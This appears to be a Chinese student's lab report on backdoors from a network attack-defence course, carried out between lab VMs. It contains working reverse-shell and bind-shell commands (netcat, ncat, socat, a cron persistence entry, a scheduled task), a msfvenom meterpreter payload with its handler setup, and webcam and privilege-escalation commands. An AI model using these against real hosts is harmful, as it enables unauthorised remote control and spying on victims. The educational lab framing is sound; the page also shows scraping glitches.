2018-2019-2 20165237《網絡對抗技術》Exp2 後門原理與實踐

2018-2019-2 20165237《網絡對抗技術》Exp2 後門原理與實踐

1、實踐目標

  • 使用netcat獲取主機操做Shell,cron啓動
  • 使用socat獲取主機操做Shell, 任務計劃啓動
  • 使用MSF meterpreter(或其餘軟件)生成可執行文件,利用ncat或socat傳送到主機並運行獲取主機Shell
  • 使用MSF meterpreter(或其餘軟件)生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容,並嘗試提權

2、基礎知識

  • Kali地址:192.168.153.134
    linux

  • Win10地址:169.254.0.178
    web

  • 保證能ping通:
    shell

  • 關閉防火牆和殺毒軟件vim


3、Exp2.1 使用ncat,本機(Windows)得到虛擬機(Linux)操做shell

實驗步驟:

  • win10中使用ncat監聽5237端口
ncat.exe -l -p 5237
  • 在Linux輸入指令
nc 192.168.153.134 -e /bin/sh

反彈鏈接Windows主機的 5237 端口windows

  • 攻擊成功:Win10成功得到Kali操做shell,可以進行操做
    安全

  • 相同道理:在Linux中監聽5237端口網絡

  • 在Windows輸入指令tcp

ncat.exe  -e cmd.exe 192.168.153.134 5237

反彈鏈接Linux的5237端口編輯器

  • 攻擊成功:

4、Exp2.2使用netcat獲取主機操做Shell,cron啓動

實驗原理

  • cron是linux下用來週期性的執行某種任務或等待處理某些事件的一個守護進程,與windows下的計劃任務相似,當安裝完成操做系統後,默認會安裝此服務 工具,而且會自動啓動cron進程,cron進程每分鐘會按期檢查是否有要執行的任務,若是有要執行的任務,則自動執行該任務。工具

    實驗步驟

  • 用 crontab -e 指令編輯定時任務,選擇3

  • vim編輯器中用 i 改成插入模式,在最後一行插入 50 19 23 3 * /bin/netcat 192.168.153.134 5237 -e /bin/sh 後輸入 :wq! 保存並退出

  • 成功顯示ls:


5、Exp2.3使用socat獲取主機操做Shell, 任務計劃啓動

實驗步驟

  • win中打開控制面板,選中管理工具->任務計劃程序
  • 建立新任務,填寫任務名稱,新建一個觸發器。

  • 同時建立新操做,在操做->程序或腳本中選擇 socat.exe 文件的路徑,在添加參數一欄填寫 tcp-listen:5237 exec:cmd.exe,pty,stderr

  • 按快捷鍵win+L即能鎖定計算機,建立的任務開始運行。

  • 此時在Linux中輸入指令 socat - tcp:192.168.153.134 5237 ,發現成功得到了cmd shell,可以輸入Windows的命令(這裏由於當時保存截圖的時候覆蓋了,後來寫博客才發現少了這張截圖。。不過真的成功了!)

    6、Exp2.4使用MSF meterpreter生成可執行文件,利用ncat或socat傳送到主機並運行獲取主機Shell

    實驗步驟

  • Linux中輸入指令生成後門程序
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.153.134 LPORT=5237 -f exe > 20165237.exe

  • 在Linux中輸入指令msfconsole,進入msf命令行,msf啓動監聽前須要進行一些設置
use exploit/multi/handler    /*進入handler模式*/

set payload windows/meterpreter/reverse_tcp  /*對應生成的後門程序設置payload*/

show options  /*查看當前信息狀態*/

set LHOST 192.168.153.134  /*設置LHOST,其中ip爲Linux的ip*/

set LPORT 5237 /*設置LPORT*/

exploit /*啓動監聽*/

  • 啓動監聽後再在win中運行後門程序,此時Linux上已經得到了Windows主機的鏈接,而且獲得了遠程控制的shell,可以輸入Windows中的命令。

7、Exp2.5使用MSF meterpreter生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容,並嘗試提權

實驗步驟

  • 獲取攝像頭和錄像:
webcam_snap / webcam_stream


  • 獲取運行msf會話的用戶名,從而查看當前會話具備的權限;提高管理員權限(此時好像已經最高權限了)
getuid

get system


8、實驗感想與問題

  • 感想:此次實驗,不得不說很讓我震驚。這是我第一次實際上get到後門獲取信息的知識,很知足。但願之後可以更深刻的學到相關理論和知識,不只學會攻擊,也要學會防範。

  • 例舉你能想到的一個後門進入到你係統中的可能方式?

答:

  • 例舉你知道的後門如何啓動起來(win及linux)的方式?

答:在下載軟件的時候,可能會有捆綁垃圾下載下來,而後修改開機的啓動項,當攻擊者輸入命令時,本機可能會自動響應。

  • Meterpreter有哪些給你映像深入的功能?

答:我以爲最深入的就是錄像和音頻的獲取(這不就是黑客監視麼!!)我已經將筆記本的攝像頭貼起來了。

  • 如何發現本身有系統有沒有被安裝後門?

答:360安全衛士或許是個很好的選擇;不過若是真正想要發現後門程序,我以爲要用抓包技術來分析信息。

相關文章
相關標籤/搜索